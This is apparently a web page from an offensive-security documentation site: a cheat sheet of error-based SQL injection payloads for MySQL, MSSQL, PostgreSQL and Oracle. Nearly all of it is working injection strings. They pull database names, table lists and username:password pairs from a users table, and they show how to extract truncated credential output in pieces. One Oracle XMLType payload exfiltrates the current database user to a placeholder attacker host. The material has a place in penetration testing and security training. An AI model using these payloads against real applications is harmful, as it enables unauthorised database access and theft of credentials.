Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Error-based SQLi extracts data by triggering database errors that include query results in the error message. Requires: verbose error messages displayed on page.

MySQL

ExtractValue

' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- -
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e))-- -
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(username,0x3a,password) FROM users),0x7e))-- -

UpdateXML

' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -
' AND updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e),1)-- -

Double Query (Subquery)

' AND (SELECT 1 FROM (SELECT count(*),concat((SELECT database()),0x3a,floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -

Geometry Functions

' AND ST_LatFromGeoHash(concat(0x7e,(SELECT database())))-- -
' AND ST_LongFromGeoHash(concat(0x7e,(SELECT database())))-- -

MSSQL

CONVERT / CAST

' AND 1=CONVERT(int,(SELECT db_name()))-- -
' AND 1=CONVERT(int,(SELECT top 1 name FROM sysobjects WHERE xtype='U'))-- -
' AND 1=CONVERT(int,(SELECT top 1 username FROM users))-- -

' AND 1=CAST((SELECT db_name()) AS int)-- -

Having + Group By

' HAVING 1=1-- -
' GROUP BY column HAVING 1=1-- -
Reveals column names in error message.

PostgreSQL

CAST Error

' AND 1=CAST((SELECT current_database()) AS int)-- -
' AND 1=CAST((SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema='public') AS int)-- -
' AND 1=CAST((SELECT username||':'||password FROM users LIMIT 1) AS int)-- -

Oracle

UTL_INADDR

' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual))-- -

CTXSYS.DRITHSX.SN

' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))-- -

XMLType

' AND extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % x SYSTEM "http://'||(SELECT user FROM dual)||'.ATTACKER/">%x;]>'),'/l')-- -

Truncation

Error messages often truncate output. Extract in parts: 
' AND extractvalue(1,concat(0x7e,SUBSTR((SELECT group_concat(username,0x3a,password) FROM users),1,30),0x7e))-- -
' AND extractvalue(1,concat(0x7e,SUBSTR((SELECT group_concat(username,0x3a,password) FROM users),31,30),0x7e))-- -

Quick Reference

DatabaseTechnique
MySQLextractvalue(1,concat(0x7e,(QUERY)))
MySQLupdatexml(1,concat(0x7e,(QUERY)),1)
MSSQLCONVERT(int,(QUERY))
PostgreSQLCAST((QUERY) AS int)
OracleUTL_INADDR.GET_HOST_ADDRESS((QUERY))

Sources